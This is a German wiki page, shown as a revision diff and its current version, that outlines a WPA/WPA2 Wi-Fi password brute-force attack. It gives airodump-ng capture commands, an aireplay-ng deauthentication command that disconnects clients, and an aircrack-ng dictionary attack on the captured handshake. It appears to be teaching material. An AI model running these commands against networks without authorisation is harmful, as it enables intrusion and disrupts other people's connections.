Wlan Bruteforce Attacke Theorie: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Ziel= *WPA/WPA2 =Wir brauchen= *AirCrack (Ist bei Kali schon dabei) *WLAN-Karte, die den Monitoring-Modus unterstützt. =Monitormodus= *Leitet alle empfangene…“) |
(→UTH) |
||
| (13 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 8: | Zeile 8: | ||
*Kein anderer Prozess sollte auf die Karte zugreifen | *Kein anderer Prozess sollte auf die Karte zugreifen | ||
=Wir wollen= | =Wir wollen= | ||
| − | *Eine Liste mit möglichen Passwörtern | + | *Eine Liste mit möglichen Passwörtern |
| − | *Die BSSID des anzugreifenden Access Points | + | *Die BSSID des anzugreifenden Access Points |
| − | *Einen mitgeschnittenen Handshake | + | *Einen mitgeschnittenen Handshake |
| + | |||
| + | =Passwortlisten= | ||
| + | *[https://github.com/danielmiessler/SecLists/tree/master/Passwords Passwortliste Github] | ||
| + | *selbst erstellen mit crunch oder CeWL | ||
| + | =WLAN Access Points in Reichweite= | ||
| + | ==Tool== | ||
| + | *airodump-ng WLAN-INTERFACE | ||
| + | ==Infos== | ||
| + | *BSSID | ||
| + | *CH | ||
| + | *ENC | ||
| + | *BSSIDSTADION (Client) | ||
| + | |||
| + | ==AUTH== | ||
| + | *PSK | ||
| + | *MGT | ||
| + | |||
| + | =Handshake= | ||
| + | ==Vorgehensweise== | ||
| + | *Bei Neuanmeldung | ||
| + | *Mitschnitt des Handshakes | ||
| + | *Schreiben in eine Capture Datei. | ||
| + | ==Tool== | ||
| + | *airodump-ng --bssid BSSID -c CHANNEL --write CAPUTURE-DATEI WLAN-INTERFACE | ||
| + | =Neuanmeldung am ACCESSPOINT= | ||
| + | *Man wartet, bis sich ein Nutzer neu verbindet | ||
| + | *oder aktive Geräte zum Neuverbinden zwingen über eine Deauthentication-Attacke | ||
| + | =Deauthentication-Attacke= | ||
| + | *Kickt verbundene Geräte vom jeweiligen Access Point | ||
| + | *aireplay-ng -0 50 -a BSSID -c BSSIDSTADION WLAN-INTERFACE | ||
| + | *Handshake nach wieder verbinden | ||
| + | =Die Bruteforce Attacke= | ||
| + | *Password liste wird gegen Handshake gehashed | ||
| + | *aircrack-ng -w password.lst -b $BSSID wlan.cap-01.cap | ||
| + | *Bei Erfolg sieht man das Passwort | ||
Aktuelle Version vom 8. Juni 2021, 07:37 Uhr
Ziel
- WPA/WPA2
Wir brauchen
- AirCrack (Ist bei Kali schon dabei)
- WLAN-Karte, die den Monitoring-Modus unterstützt.
Monitormodus
- Leitet alle empfangenen WLAN-Frames an das Betriebssystem weiter
- Kein anderer Prozess sollte auf die Karte zugreifen
Wir wollen
- Eine Liste mit möglichen Passwörtern
- Die BSSID des anzugreifenden Access Points
- Einen mitgeschnittenen Handshake
Passwortlisten
- Passwortliste Github
- selbst erstellen mit crunch oder CeWL
WLAN Access Points in Reichweite
Tool
- airodump-ng WLAN-INTERFACE
Infos
- BSSID
- CH
- ENC
- BSSIDSTADION (Client)
AUTH
- PSK
- MGT
Handshake
Vorgehensweise
- Bei Neuanmeldung
- Mitschnitt des Handshakes
- Schreiben in eine Capture Datei.
Tool
- airodump-ng --bssid BSSID -c CHANNEL --write CAPUTURE-DATEI WLAN-INTERFACE
Neuanmeldung am ACCESSPOINT
- Man wartet, bis sich ein Nutzer neu verbindet
- oder aktive Geräte zum Neuverbinden zwingen über eine Deauthentication-Attacke
Deauthentication-Attacke
- Kickt verbundene Geräte vom jeweiligen Access Point
- aireplay-ng -0 50 -a BSSID -c BSSIDSTADION WLAN-INTERFACE
- Handshake nach wieder verbinden
Die Bruteforce Attacke
- Password liste wird gegen Handshake gehashed
- aircrack-ng -w password.lst -b $BSSID wlan.cap-01.cap
- Bei Erfolg sieht man das Passwort